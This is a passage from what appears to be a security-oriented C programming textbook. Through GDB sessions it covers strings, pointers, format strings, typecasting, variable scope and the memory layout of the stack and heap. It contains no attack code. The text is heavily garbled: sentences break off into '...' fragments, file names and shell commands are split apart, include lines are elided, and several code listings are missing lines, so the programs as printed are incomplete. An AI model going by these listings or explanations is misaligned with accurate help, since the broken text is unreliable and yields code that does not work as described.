the ASCII table, and the s format letter will display an entire string of character
data
...
This string is the argument for the printf()
function, which indicates that moving the address of this string to the address
tored in ESP (0x8048484) has something to do with this function
...

(gdb) x/2i $eip
0x8048393 : mov DWORD PTR [esp],0x8048484
0x804839a : call 0x80482a0
(gdb) x/xw $esp
0xbffff800: 0xb8000ce0
(gdb) nexti
0x0804839a 8 printf("Hello, world!\n");
(gdb) x/xw $esp
0xbffff800: 0x08048484
(gdb)

The next instruction is actually called the printf() function; it prints the data
string
...

(gdb) x/i $eip
0x804839a : call 0x80482a0
(gdb) nexti
Hello, world!

6 for(i=0; i < 10; i++)
(gdb)

Continuing to use GDB to debug, let's examine the next two instructions
...

(gdb) x/2i $eip
0x804839f : lea eax,[ebp-4]
0x80483a2 : inc DWORD PTR [eax]
(gdb)

These two instructions basically just increment the variable i by 1
...
The execution of this instruction is
shown below
...
The execution of this instruction is also shown
below
...
This behavior corresponds to a portion of C code
in which the variable i is incremented in the for loop
...

(gdb) x/i $eip
0x80483a4 : jmp 0x804838b
(gdb)

When this instruction is executed, it will send the program back to the instruction
at address 0x804838b
...

Looking at the full disassembly again, you should be able to tell which parts of the
C code have been compiled into which machine instructions
...

(gdb) list
1 #include ...
The program execution will jump

back to the compare instruction, continue to execute the printf() call, and
increment the counter variable until it finally equals 10
...

Back to Basics
Now that the idea of programming is less abstract, there are a few other
important concepts to know about C
...
In the same way that
knowing a little about Latin can greatly improve one's understanding of the
English language, knowledge of low-level programming concepts can assist the
comprehension of higher-level ones
...

Strings
The value "Hello, world!\n" passed to the printf() function in the previous
program is a string—technically, a character array
...
A 20-character array is simply 20 adjacent
characters located in memory
...
The
char_array
...

char_array
...
h>
int main()
{
char str_a[20];
str_a[0] = 'H';
str_a[1] = 'e';
str_a[2] = 'l';
str_a[3] = 'l';
str_a[4] = 'o';
str_a[5] = ',';
str_a[6] = ' ';
str_a[7] = 'w';
str_a[8] = 'o';
str_a[9] = 'r';
str_a[10] = 'l';
str_a[11] = 'd';
str_a[12] = '!';
str_a[13] = '\n';
str_a[14] = 0;
printf(str_a);
}

The GCC compiler can also be given the -o switch to define the output file to
compile to
...

reader@hacking:~/booksrc $ gcc -o char_array char_array
...
/char_array
Hello, world!

reader@hacking:~/booksrc $

In the preceding program, a 20-element character array is defined as str_a, and
each element of the array is written to, one by one
...
Also notice that the last character is a 0
...
) The character array was defined, so 20 bytes are allocated for it, but
only 12 of these bytes are actually used
...
The remaining extra bytes are just garbage and will be
ignored
...

Since setting each character in a character array is painstaking and strings are
used fairly often, a set of standard functions was created for string manipulation
...
The order of
the function's arguments is similar to Intel assembly syntax: destination first and
then source
...
c program can be rewritten using strcpy() to
accomplish the same thing using the string library
...
h since it uses a string function
...
c
#include ...
h>
int main() {
char str_a[20];
strcpy(str_a, "Hello, world!\n");
printf(str_a);
}

Let's take a look at this program with GDB
...
The debugger will pause the program at each
breakpoint, giving us a chance to examine registers and memory
...

reader@hacking:~/booksrc $ gcc -g -o char_array2 char_array2
...
/char_array2
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
h>
2 #include ...
c, line 6
...

Make breakpoint pending on future shared library load? (y or [n]) y
Breakpoint 2 (strcpy) pending
...
c, line 8
...
At each
breakpoint, we're going to look at EIP and the instructions it points to
...

(gdb) run
Starting program: /home/reader/booksrc/char_array2
Breakpoint 4 at 0xb7f076f4
Pending breakpoint "strcpy" resolved
Breakpoint 1, main () at char_array2
...

Breakpoint 4, 0xb7f076f4 in strcpy () from /lib/tls/i686/cmov/libc
...
6
(gdb) i r eip
eip 0xb7f076f4 0xb7f076f4

(gdb) x/5i $eip
0xb7f076f4 : mov esi,DWORD PTR [ebp+8]
0xb7f076f7 : mov eax,DWORD PTR [ebp+12]
0xb7f076fa : mov ecx,esi
0xb7f076fc : sub ecx,eax
0xb7f076fe : mov edx,eax
(gdb) continue
Continuing
...
c:8
8 printf(str_a);
(gdb) i r eip
eip 0x80483d7 0x80483d7
(gdb) x/5i $eip
0x80483d7 : lea eax,[ebp-40]
0x80483da : mov DWORD PTR [esp],eax
0x80483dd : call 0x80482d4
0x80483e2 : leave
0x80483e3 : ret
(gdb)

The address in EIP at the middle breakpoint is different because the code for the

strcpy() function comes from a loaded library
...
I'd like to point out that EIP is able to travel
from the main code to the strcpy() code and back again
...
The stack lets
EIP return through long chains of function calls
...
In the output below, the stack backtrace is shown at
each breakpoint
...

Start it from the beginning? (y or n) y
Starting program: /home/reader/booksrc/char_array2
Error in re-setting breakpoint 4:
Function "strcpy" not defined
...
c:7
7 strcpy(str_a, "Hello, world!\n");
(gdb) bt
#0 main () at char_array2
...

Breakpoint 4, 0xb7f076f4 in strcpy () from /lib/tls/i686/cmov/libc
...
6
(gdb) bt
#0 0xb7f076f4 in strcpy () from /lib/tls/i686/cmov/libc
...
6
#1 0x080483d7 in main () at char_array2
...

Breakpoint 3, main () at char_array2
...
c:8
(gdb)

At the middle breakpoint, the backtrace of the stack shows its record of the
strcpy() call
...
This is due to an exploit protection
method that is turned on by default in the Linux kernel since 2
...
11
...

Signed, Unsigned, Long, and Short
By default, numerical values in C are signed, which means they can be both
negative and positive
...

Since it's all just memory in the end, all numerical values must be stored in binary,
and unsigned values make the most sense in binary
...
A 32-bit
signed integer is still just 32 bits, which means it can only be in one of 232 possible
bit combinations
...
Essentially, one of the bits is a flag marking the value positive

or negative
...

Two's complement represents negative numbers in a form suited for binary adders—
when a negative value in two's complement is added to a positive number of the
same magnitude, the result will be 0
...
It sounds
strange, but it works and allows negative numbers to be added in combination
with positive numbers using simple binary adders
...
For simplicity's sake, 8-bit numbers are used in this example
...
Then all the bits are
flipped, and 1 is added to result in the two's complement representation for
negative 73, 10110111
...
The program pcalc shows the value 256 because it's not
aware that we're only dealing with 8-bit values
...
This example might shed some light on how two's complement
works its magic
...
An unsigned integer would be declared with
unsigned int
...
The actual sizes will vary
depending on the architecture the code is compiled for
...
This works like a function that takes a data type as its input and returns the
size of a variable declared with that data type for the target architecture
...
c program explores the sizes of various data types, using the
sizeof() function
...
c
#include ...
It uses
something called a format specifier to display the value returned from the
sizeof() function calls
...

reader@hacking:~/booksrc $ gcc datatype_sizes
...
/a
...
A float is also four bytes, while a char only needs a single
byte
...

Pointers
The EIP register is a pointer that "points" to the current instruction during a
program's execution by containing its memory address
...
Since the physical memory cannot actually be moved, the
information in it must be copied
...

This is also expensive from a memory standpoint, since space for the new
destination copy must be saved or allocated before the source can be copied
...
Instead of copying a large block of
memory, it is much simpler to pass around the address of the beginning of that
block of memory
...
Since memory
on the x86 architecture uses 32-bit addressing, pointers are also 32 bits in size (4
bytes)
...

Instead of defining a variable of that type, a pointer is defined as something that
points to data of that type
...
c program is an example of a pointer being
used with the char data type, which is only 1 byte in size
...
c
#include ...
h>
int main() {

char str_a[20]; // A 20-element character array
char *pointer; // A pointer, meant for a character array
char *pointer2; // And yet another one
strcpy(str_a, "Hello, world!\n");
pointer = str_a; // Set the first pointer to the start of the array
...

printf(pointer2); // Print it
...

printf(pointer); // Print again
...
When the character array is referenced like this, it is actually
a pointer itself
...
The second pointer is set to the first pointer's
address plus two, and then some things are printed (shown in the output below)
...
c
reader@hacking:~/booksrc $
...
The program is recompiled, and a breakpoint is
set on the tenth line of the source code
...

reader@hacking:~/booksrc $ gcc -g -o pointer pointer
...
/pointer
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
h>
2 #include ...

(gdb)
11 printf(pointer);
12
13 pointer2 = pointer + 2; // Set the second one 2 bytes further in
...

15 strcpy(pointer2, "y you guys!\n"); // Copy into that spot
...

17 }
(gdb) break 11
Breakpoint 1 at 0x80483dd: file pointer
...

(gdb) run
Starting program: /home/reader/booksrc/pointer

Breakpoint 1, main () at pointer
...
Remember that the string
itself isn't stored in the pointer variable—only the memory address 0xbffff7e0 is
stored there
...
The address-of operator is a unary operator, which simply
means it operates on a single argument
...
When it's used, the address of that variable is
returned, instead of the variable itself
...

(gdb) x/xw &pointer
0xbffff7dc: 0xbffff7e0
(gdb) print &pointer
$1 = (char **) 0xbffff7dc
(gdb) print pointer
$2 = 0xbffff7e0 "Hello, world!\n"
(gdb)

When the address-of operator is used, the pointer variable is shown to be located
at the address 0xbffff7dc in memory, and it contains the address 0xbffff7e0
...
The addressof
...
This
line is shown in bold below
...
c
#include ...

reader@hacking:~/booksrc $ gcc -g addressof
...
/a
...
so
...

(gdb) list
1 #include ...

8 }
(gdb) break 8
Breakpoint 1 at 0x8048361: file addressof
...

(gdb) run
Starting program: /home/reader/booksrc/a
...
c:8
8 }
(gdb) print int_var
$1 = 5
(gdb) print &int_var
$2 = (int *) 0xbffff804
(gdb) print int_ptr
$3 = (int *) 0xbffff804
(gdb) print &int_ptr
$4 = (int **) 0xbffff800
(gdb)

As usual, a breakpoint is set and the program is executed in the debugger
...
The first print command shows
the value of int_var, and the second shows its address using the address-of
operator
...

An additional unary operator called the dereference operator exists for use with
pointers
...
It takes the form of an asterisk in front of
the variable name, similar to the declaration of a pointer
...
Used in GDB, it can retrieve
the integer value int_ptr points to
...
c code (shown in addressof2
...
The added printf() functions use format parameters,
which I'll explain in the next section
...

addressof2
...
h>
int main() {
int int_var = 5;
int *int_ptr;
int_ptr = &int_var; // Put the address of int_var into int_ptr
...
c are as follows
...
c
reader@hacking:~/booksrc $
...
out
int_ptr = 0xbffff834
&int_ptr = 0xbffff830
*int_ptr = 0x00000005
int_var is located at 0xbffff834 and contains 5
int_ptr is located at 0xbffff830, contains 0xbffff834, and points to 5
reader@hacking:~/booksrc $

When the unary operators are used with pointers, the address-of operator can be
thought of as moving backward, while the dereference operator moves forward in
the direction the pointer is pointing
...
This
function can also use format strings to print variables in many different formats
...
The way the printf() function has been used in the previous
programs, the "Hello, world!\n" string technically is the format string;
however, it is devoid of special escape sequences
...
Each format parameter begins with a
percent sign (%) and uses a single-character shorthand very similar to formatting
characters used by GDB's examine command
...
There are also some format parameters that expect pointers, such as
the following
...
The %nformat parameter
is unique in that it actually writes data
...

For now, our focus will just be the format parameters used for displaying data
...
c program shows some examples of different format parameters
...
c
#include ...
The final printf()
call uses the argument A, which will provide the address of the variable A
...

reader@hacking:~/booksrc $ gcc -o fmt_strings fmt_strings
...
/fmt_strings
[A] Dec: -73, Hex: ffffffb7, Unsigned: 4294967223
[B] Dec: 31337, Hex: 7a69, Unsigned: 31337
[field width on B] 3: '31337', 10: ' 31337', '00031337'
[string] sample Address bffff870
variable A is at address: bffff86c
reader@hacking:~/booksrc $

The first two calls to printf() demonstrate the printing of variables A and B,
using different format parameters
...
The %d
format parameter allows for negative values, while %u does not, since it is
expecting unsigned values
...
This is because A is a negative number stored in two's complement,
and the format parameter is trying to print it as if it were an unsigned value
...

The third line in the example, labeled [field width on B], shows the use of the
field-width option in a format parameter
...
However, this is not a
maximum field width—if the value to be outputted is greater than the field width,
the field width will be exceeded
...
When 10 is used as the field width, 5 bytes of blank space are
outputted before the output data
...
When 08 is used, for
example, the output is 00031337
...
Remember that the variable string is actually a pointer containing the
address of the string, which works out wonderfully, since the %s format parameter
expects its data to be passed by reference
...
This value is displayed as eight hexadecimal
digits, padded by zeros
...
Minimum field widths can be set by putting a number
right after the percent sign, and if the field width begins with 0, it will be padded
with zeros
...
So far, so good
...
One key difference is that the scanf() function expects all of its
arguments to be pointers, so the arguments must actually be variable addresses—
not the variables themselves
...
The
input
...

input
...
h>
#include ...
c, the scanf() function is used to set the count variable
...

reader@hacking:~/booksrc $ gcc -o input input
...
/input
Repeat how many times? 3
0 - Hello, world!
1 - Hello, world!
2 - Hello, world!
reader@hacking:~/booksrc $
...
In
addition, the ability to output the values of variables allows for debugging in the
program, without the use of a debugger
...

Typecasting
Typecasting is simply a way to temporarily change a variable's data type, despite
how it was originally defined
...
The syntax for typecasting is as follows:
(typecast_data_type) variable

This can be used when dealing with integers and floating-point variables, as
typecasting
...

typecasting
...
h>
int main() {
int a, b;
float c, d;

a = 13;
b = 5;
c = a / b; // Divide using integers
...

printf("[integers]\t a = %d\t b = %d\n", a, b);
printf("[floats]\t c = %f\t d = %f\n", c, d);
}

The results of compiling and executing typecasting
...

reader@hacking:~/booksrc $ gcc typecasting
...
/a
...
000000 d = 2
...

However, if these integer variables are typecast into floats, they will be treated as
such
...
6
...
Even though a pointer is just a memory address, the C
compiler still demands a data type for every pointer
...
An integer pointer should only point to integer data,
while a character pointer should only point to character data
...
An integer is four bytes in size, while a character only takes
up a single byte
...
c program will demonstrate and explain these
concepts further
...
This is shorthand meant for displaying pointers and is basically
equivalent to 0x%08x
...
c
#include ...

printf("[integer pointer] points to %p, which contains the integer %d\n",
int_pointer, *int_pointer);
int_pointer = int_pointer + 1;

}
for(i=0; i < 5; i++) { // Iterate through the char array with the char_pointer
...
Two pointers are also defined, one with the
integer data type and one with the character data type, and they are set to point
at the start of the corresponding data arrays
...
In the loops, when the integer and character values are actually
printed with the %d and %c format parameters, notice that the corresponding
printf() arguments must dereference the pointer variables
...

reader@hacking:~/booksrc $ gcc pointer_types
...
/a
...
Since a char is only 1 byte, the pointer to the next char would
naturally also be 1 byte over
...

In pointer_types2
...
The major changes to the code are marked
in bold
...
c
#include ...

for(i=0; i < 5; i++) { // Iterate through the int array with the int_pointer
...

printf("[char pointer] points to %p, which contains the integer %d\n",
char_pointer, *char_pointer);
char_pointer = char_pointer + 1;
}
}

The output below shows the warnings spewed forth from the compiler
...
c
pointer_types2
...
c:12: warning: assignment from incompatible pointer type
pointer_types2
...
But the compiler and
perhaps the programmer are the only ones that care about a pointer's type
...

reader@hacking:~/booksrc $
...
out
[integer pointer] points to 0xbffff810, which contains the char 'a'
[integer pointer] points to 0xbffff814, which contains the char 'e'
[integer pointer] points to 0xbffff818, which contains the char '8'
[integer pointer] points to 0xbffff81c, which contains the char '
[integer pointer] points to 0xbffff820, which contains the char '?'
[char pointer] points to 0xbffff7f0, which contains the integer 1
[char pointer] points to 0xbffff7f1, which contains the integer 0
[char pointer] points to 0xbffff7f2, which contains the integer 0
[char pointer] points to 0xbffff7f3, which contains the integer 0
[char pointer] points to 0xbffff7f4, which contains the integer 2
reader@hacking:~/booksrc $

Even though the int_pointer points to character data that only contains 5 bytes
of data, it is still typed as an integer
...
Similarly, the char_pointer's address is
only incremented by 1 each time, stepping through the 20 bytes of integer data
(five 4-byte integers), one byte at a time
...
The 4-byte value of 0x00000001 is actually stored in memory as 0x01, 0x00,
0x00, 0x00
...
Since the pointer type determines the size of the data

it points to, it's important that the type is correct
...
c below, typecasting is just a way to change the type of a variable
on the fly
...
c
#include ...

for(i=0; i < 5; i++) { // Iterate through the int array with the int_pointer
...

printf("[char pointer] points to %p, which contains the integer %d\n",
char_pointer, *char_pointer);
char_pointer = (char *) ((int *) char_pointer + 1);
}
}

In this code, when the pointers are initially set, the data is typecast into the
pointer's data type
...
To fix
that, when 1 is added to the pointers, they must first be typecast into the correct
data type so the address is incremented by the correct amount
...
It doesn't look
too pretty, but it works
...
c
reader@hacking:~/booksrc $
...
out
[integer pointer] points to 0xbffff810, which contains the char 'a'
[integer pointer] points to 0xbffff811, which contains the char 'b'
[integer pointer] points to 0xbffff812, which contains the char 'c'
[integer pointer] points to 0xbffff813, which contains the char 'd'
[integer pointer] points to 0xbffff814, which contains the char 'e'
[char pointer] points to 0xbffff7f0, which contains the integer 1
[char pointer] points to 0xbffff7f4, which contains the integer 2
[char pointer] points to 0xbffff7f8, which contains the integer 3
[char pointer] points to 0xbffff7fc, which contains the integer 4
[char pointer] points to 0xbffff800, which contains the integer 5
reader@hacking:~/booksrc $

Naturally, it is far easier just to use the correct data type for pointers in the first

place; however, sometimes a generic, typeless pointer is desired
...
Experimenting with
void pointers quickly reveals a few things about typeless pointers
...
In order to retrieve the value
stored in the pointer's memory address, the compiler must first know what type of
data it is
...
These are fairly intuitive limitations, which means that a void pointer's
main purpose is to simply hold a memory address
...
c program can be modified to use a single void pointer by
typecasting it to the proper type each time it's used
...
This also means a void pointer must always be typecast when
dereferencing it, however
...
c,
which uses a void pointer
...
c
#include ...

printf("[char pointer] points to %p, which contains the char '%c'\n",
void_pointer, *((char *) void_pointer));
void_pointer = (void *) ((char *) void_pointer + 1);
}
void_pointer = (void *) int_array;
for(i=0; i < 5; i++) { // Iterate through the int array with the int_pointer
...
c are as follows
...
c
reader@hacking:~/booksrc $
...
out
[char pointer] points to 0xbffff810, which contains the char 'a'
[char pointer] points to 0xbffff811, which contains the char 'b'
[char pointer] points to 0xbffff812, which contains the char 'c'
[char pointer] points to 0xbffff813, which contains the char 'd'
[char pointer] points to 0xbffff814, which contains the char 'e'
[integer pointer] points to 0xbffff7f0, which contains the integer 1

[integer pointer] points to 0xbffff7f4, which contains the integer 2
[integer pointer] points to 0xbffff7f8, which contains the integer 3
[integer pointer] points to 0xbffff7fc, which contains the integer 4
[integer pointer] points to 0xbffff800, which contains the integer 5
reader@hacking:~/booksrc $

The compilation and output of this pointer_types4
...
c
...

Since the type is taken care of by the typecasts, the void pointer is truly nothing
more than a memory address
...
In pointer_types5
...

pointer_types5
...
h>
int main() {
int i;
char char_array[5] = {'a', 'b', 'c', 'd', 'e'};
int int_array[5] = {1, 2, 3, 4, 5};
unsigned int hacky_nonpointer;
hacky_nonpointer = (unsigned int) char_array;
for(i=0; i < 5; i++) { // Iterate through the int array with the int_pointer
...

printf("[hacky_nonpointer] points to %p, which contains the integer %d\n",
hacky_nonpointer, *((int *) hacky_nonpointer));
hacky_nonpointer = hacky_nonpointer + sizeof(int);
}
}

This is rather hacky, but since this integer value is typecast into the proper
pointer types when it is assigned and de-referenced, the end result is the same
...

reader@hacking:~/booksrc $ gcc pointer_types5
...
/a
...
In the end, after the program has
been compiled, the variables are nothing more than memory addresses
...

Command-Line Arguments
Many nongraphical programs receive input in the form of command-line
arguments
...
This tends to be
more efficient and is a useful input method
...
The integer will contain the number of arguments, and the array
of strings will contain each of those arguments
...
c program and
its execution should explain things
...
c
#include ...
c
reader@hacking:~/booksrc $
...
/commandline
reader@hacking:~/booksrc $
...
/commandline
argument #1 - this
argument #2 - is
argument #3 - a
argument #4 - test
reader@hacking:~/booksrc $

The zeroth argument is always the name of the executing binary, and the rest of

the argument array (often called an argument vector) contains the remaining
arguments as strings
...
Regardless of this, the argument is passed in as a string;
however, there are standard conversion functions
...
The most common of these functions is atoi(), which is short for
ASCII to integer
...
Observe its usage in convert
...

convert
...
h>
void usage(char *program_name) {
printf("Usage: %s <# of times to repeat>\n", program_name);
exit(1);
}
int main(int argc, char *argv[]) {
int i, count;
if(argc < 3) // If fewer than 3 arguments are used,
usage(argv[0]); // display usage message and exit
...

printf("Repeating %d times
...

}

The results of compiling and executing convert
...

reader@hacking:~/booksrc $ gcc convert
...
/a
...
/a
...
/a
...

0 - Hello, world!
1 - Hello, world!
2 - Hello, world!
reader@hacking:~/booksrc $

In the preceding code, an if statement makes sure that three arguments are
used before these strings are accessed
...
In C it's important to check for these types of conditions and
handle them in program logic
...
The convert2
...

convert2
...
h>
void usage(char *program_name) {
printf("Usage: %s <# of times to repeat>\n", program_name);
exit(1);
}
int main(int argc, char *argv[]) {
int i, count;
// if(argc < 3) // If fewer than 3 arguments are used,
// usage(argv[0]); // display usage message and exit
...

printf("Repeating %d times
...

}

The results of compiling and executing convert2
...

reader@hacking:~/booksrc $ gcc convert2
...
/a
...
This results
in the program crashing due to a segmentation fault
...
When the program attempts to access an address that is out of
bounds, it will crash and die in what's called a segmentation fault
...

reader@hacking:~/booksrc $ gcc -g convert2
...
/a
...
so
...

(gdb) run test
Starting program: /home/reader/booksrc/a
...

0xb7ec819b in ?? () from /lib/tls/i686/cmov/libc
...
6
(gdb) where
#0 0xb7ec819b in ?? () from /lib/tls/i686/cmov/libc
...
6
#1 0xb800183c in ?? ()
#2 0x00000000 in ?? ()
(gdb) break main
Breakpoint 1 at 0x8048419: file convert2
...

(gdb) run test
The program being debugged has been started already
...
out test
Breakpoint 1, main (argc=2, argv=0xbffff894) at convert2
...

Program received signal SIGSEGV, Segmentation fault
...
so
...
out"
(gdb) x/s 0xbffff9ce
0xbffff9ce: "test"
(gdb) x/s 0x00000000
0x0:

(gdb) quit
The program is running
...
The where command will sometimes
show a useful backtrace of the stack; however, in this case, the stack was too
badly mangled in the crash
...
Since the
argument vector is a pointer to list of strings, it is actually a pointer to a list of
pointers
...
The first one is the zeroth argument, the second is the test argument,
and the third is zero, which is out of bounds
...

Variable Scoping
Another interesting concept regarding memory in C is variable scoping or context
—in particular, the contexts of variables within functions
...
In fact,
multiple calls to the same function all have their own contexts
...
c
...
c
#include ...

reader@hacking:~/booksrc $ gcc scope
...
/a
...
Notice that
within the main() function, the variable i is 3, even after calling func1() where
the variable i is 5
...
The best way to think of this is that
each function call has its own version of the variable i
...
Variables are global if they are defined at the beginning of the code,
outside of any functions
...
c example code shown below, the variable
j is declared globally and set to 42
...

scope2
...
h>
int j = 42; // j is a global variable
...

printf("\t\t\t[in func3] i = %d, j = %d\n", i, j);
}
void func2() {
int i = 7;
printf("\t\t[in func2] i = %d, j = %d\n", i, j);
printf("\t\t[in func2] setting j = 1337\n");
j = 1337; // Writing to j
func3();

printf("\t\t[back in func2] i = %d, j = %d\n", i, j);
}
void func1() {
int i = 5;
printf("\t[in func1] i = %d, j = %d\n", i, j);
func2();
printf("\t[back in func1] i = %d, j = %d\n", i, j);
}
int main() {
int i = 3;
printf("[in main] i = %d, j = %d\n", i, j);
func1();
printf("[back in main] i = %d, j = %d\n", i, j);
}

The results of compiling and executing scope2
...

reader@hacking:~/booksrc $ gcc scope2
...
/a
...

In this case, the compiler prefers to use the local variable
...
The global variable j is just stored in memory, and every
function is able to access that memory
...

Printing the memory addresses of these variables will give a clearer picture of
what's going on
...
c example code below, the variable addresses are
printed using the unary address-of operator
...
c
#include ...

void func3() {
int i = 11, j = 999; // Here, j is a local variable of func3()
...
c are as follows
...
c
reader@hacking:~/booksrc $
...
out
[in main] i @ 0xbffff834 = 3
[in main] j @ 0x08049988 = 42
[in func1] i @ 0xbffff814 = 5
[in func1] j @ 0x08049988 = 42
[in func2] i @ 0xbffff7f4 = 7
[in func2] j @ 0x08049988 = 42
[in func2] setting j = 1337
[in func3] i @ 0xbffff7d4 = 11
[in func3] j @ 0xbffff7d0 = 999
[back in func2] i @ 0xbffff7f4 = 7
[back in func2] j @ 0x08049988 = 1337
[back in func1] i @ 0xbffff814 = 5
[back in func1] j @ 0x08049988 = 1337
[back in main] i @ 0xbffff834 = 3
[back in main] j @ 0x08049988 = 1337
reader@hacking:~/booksrc $

In this output, it is obvious that the variable j used by func3() is different than
the j used by the other functions
...
Also, notice that
the variable i is actually a different memory address for each function
...

Then the backtrace command shows the record of each function call on the stack
...
c
reader@hacking:~/booksrc $ gdb -q
...
out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
h>
2
3 int j = 42; // j is a global variable
...

7 printf("\t\t\t[in func3] i @ 0x%08x = %d\n", &i, i);
8 printf("\t\t\t[in func3] j @ 0x%08x = %d\n", &j, j);
9 }
10
(gdb) break 7
Breakpoint 1 at 0x8048388: file scope3
...

(gdb) run
Starting program: /home/reader/booksrc/a
...
c:7
7 printf("\t\t\t[in func3] i @ 0x%08x = %d\n", &i, i);
(gdb) bt
#0 func3 () at scope3
...
c:17
#2 0x0804849f in func1 () at scope3
...
c:35
(gdb)

The backtrace also shows the nested function calls by looking at records kept on
the stack
...
Each line in the backtrace corresponds to a stack frame
...
The local variables contained in
each stack frame can be shown in GDB by adding the word full to the backtrace
command
...
c:7
i = 11
j = 999
#1 0x0804841d in func2 () at scope3
...
c:26
i = 5
#3 0x0804852b in main () at scope3
...
The global version of the variable j is used in the other function's
contexts
...
Similar to global

variables, a static variable remains intact between function calls; however, static
variables are also akin to local variables since they remain local within a
particular function context
...
The code in static
...

static
...
h>
void function() { // An example function, with its own context
int var = 5;
static int static_var = 5; // Static variable initialization
printf("\t[in function] var = %d\n", var);
printf("\t[in function] static_var = %d\n", static_var);
var++; // Add one to var
...

}
int main() { // The main function, with its own context
int i;
static int static_var = 1337; // Another static, in a different context
for(i=0; i < 5; i++) { // Loop 5 times
...

}
}

The aptly named static_var is defined as a static variable in two places: within
the context of main() and within the context of function()
...
The function
simply prints the values of the two variables in its context and then adds 1 to both
of them
...

reader@hacking:~/booksrc $ gcc static
...
/a
...
This is because static variables retain their values, but also because
they are only initialized once
...

Once again, printing the addresses of these variables by dereferencing them with
the unary address operator will provide greater viability into what's really going
on
...
c for an example
...
c
#include ...

static_var++; // Add 1 to static_var
...

}
}

The results of compiling and executing static2
...

reader@hacking:~/booksrc $ gcc static2
...
/a
...
You may
have noticed that the addresses of the local variables all have very high
addresses, like 0xbffff814, while the global and static variables all have very low
memory addresses, like 0x0804968c and 0x8049688
...

Read on for your answers
...
Each segment represents a special portion of memory that is set aside
for a certain purpose
...
This is where the
assembled machine language instructions of the program are located
...
As a program executes,
the EIP is set to the first instruction in the text segment
...
Reads the instruction that EIP is pointing to
2
...
Executes the instruction that was read in step 1
4
...
The processor doesn't care about the
change, because it's expecting the execution to be nonlinear anyway
...

Write permission is disabled in the text segment, as it is not used to store
variables, only code
...

Another advantage of this segment being read-only is that it can be shared among
different copies of the program, allowing multiple executions of the program at
the same time without any problems
...

The data and bss segments are used to store global and static program variables
...
Although these segments are
writable, they also have a fixed size
...
Both
global and static variables are able to persist because they are stored in their own
memory segments
...
Blocks
of memory in this segment can be allocated and used for whatever the
programmer might need
...
All of the memory within
the heap is managed by allocator and deallocator algorithms, which respectively
reserve a region of memory in the heap for use and remove reservations to allow
that portion of memory to be reused for later reservations
...
This means a
programmer using the heap allocation functions can reserve and free memory on
the fly
...

The stack segment also has variable size and is used as a temporary scratch pad to
store local function variables and context during function calls
...
When a program calls a function, that function will
have its own set of passed variables, and the function's code will be at a different
memory location in the text (or code) segment
...
All of this information is
stored together on the stack in what is collectively called a stack frame
...

In general computer science terms, a stack is an abstract data structure that is
used frequently
...
Think of it as putting beads on
a piece of string that has a knot on one end—you can't get the first bead off until
you have removed all the other beads
...

As the name implies, the stack segment of memory is, in fact, a stack data
structure, which contains stack frames
...
Since this is very dynamic behavior, it makes
sense that the stack is also not of a fixed size
...

The FILO nature of a stack might seem odd, but since the stack is used to store
context, it's very useful
...
The EBP register—sometimes called the frame
pointer (FP) or local base (LB) pointer— is used to reference local function variables in
the current stack frame
...
The SFP
is used to restore EBP to its previous value, and the return address is used to restore
EIP to the next instruction found after the function call
...

The following stack_example
...

Memory Segmentation
stack_example
...
The local variables for the function include a
single character called flag and a 10-character buffer called buffer
...
After compiling the program, its
inner workings can be examined with GDB
...
The main()
function starts at 0x08048357 and test_function()starts at 0x08048344
...

These instructions are collectively called the procedure prologue or function prologue
...
Sometimes the function prologue will handle some stack
alignment as well
...

reader@hacking:~/booksrc $ gcc -g stack_example
...
/a
...
so
...

(gdb) disass main
Dump of assembler code for function main():
0x08048357 : push ebp
0x08048358 : mov ebp,esp
0x0804835a : sub esp,0x18
0x0804835d : and esp,0xfffffff0
0x08048360 : mov eax,0x0
0x08048365 : sub esp,eax

0x08048367 : mov DWORD PTR [esp+12],0x4
0x0804836f : mov DWORD PTR [esp+8],0x3
0x08048377 : mov DWORD PTR [esp+4],0x2
0x0804837f : mov DWORD PTR [esp],0x1
0x08048386 : call 0x8048344
0x0804838b : leave
0x0804838c : ret
End of assembler dump
(gdb) disass test_function()
Dump of assembler code for function test_function:
0x08048344 : push ebp
0x08048345 : mov ebp,esp

0x08048347 : sub esp,0x28

0x0804834a : mov DWORD PTR [ebp-12],0x7a69
0x08048351 : mov BYTE PTR [ebp-40],0x41
0x08048355 : leave
0x08048356 : ret
End of assembler dump
(gdb)

When the program is run, the main() function is called, which simply calls
test_function()
...
When
test_function() is called, the function arguments are pushed onto the stack in
reverse order (since it's FILO)
...

These values correspond to the variables d, c, b, and a in the function
...

(gdb) disass main
Dump of assembler code for function main:
0x08048357 : push ebp
0x08048358 : mov ebp,esp
0x0804835a : sub esp,0x18
0x0804835d : and esp,0xfffffff0
0x08048360 : mov eax,0x0
0x08048365 : sub esp,eax
0x08048367 : mov DWORD PTR [esp+12],0x4
0x0804836f : mov DWORD PTR [esp+8],0x3
0x08048377 : mov DWORD PTR [esp+4],0x2
0x0804837f : mov DWORD PTR [esp],0x1

0x08048386 : call 0x8048344
0x0804838b : leave
0x0804838c : ret
End of assembler dump
(gdb)

Next, when the assembly call instruction is executed, the return address is pushed
onto the stack and the execution flow jumps to the start of test_function() at
0x08048344
...
In this case, the return address would point
to the leave instruction in main() at 0x0804838b
...
In this step, the current value of EBP
is pushed to the stack
...
The current value of ESP is
then copied into EBP to set the new frame pointer
...
Memory is saved
for these variables by subtracting fromESP
...

We can watch the stack frame construction on the stack using GDB
...
GDB will put the
first breakpoint before the function arguments are pushed to the stack, and the
second breakpoint after test_function()'s procedure prologue
...

(gdb) list main
4
5 flag = 31337;
6 buffer[0] = 'A';
7 }
8
9 int main() {
10 test_function(1, 2, 3, 4);
11 }
(gdb) break 10
Breakpoint 1 at 0x8048367: file stack_example
...

(gdb) break test_function
Breakpoint 2 at 0x804834a: file stack_example
...

(gdb) run
Starting program: /home/reader/booksrc/a
...
c:10
10 test_function(1, 2, 3, 4);
(gdb) i r esp ebp eip
esp 0xbffff7f0 0xbffff7f0
ebp 0xbffff808 0xbffff808
eip 0x8048367 0x8048367
(gdb) x/5i $eip
0x8048367 : mov DWORD PTR [esp+12],0x4
0x804836f : mov DWORD PTR [esp+8],0x3
0x8048377 : mov DWORD PTR [esp+4],0x2
0x804837f : mov DWORD PTR [esp],0x1
0x8048386 : call 0x8048344
(gdb)

This breakpoint is right before the stack frame for the test_function() call is

created
...
The next breakpoint is right after the procedure prologue for
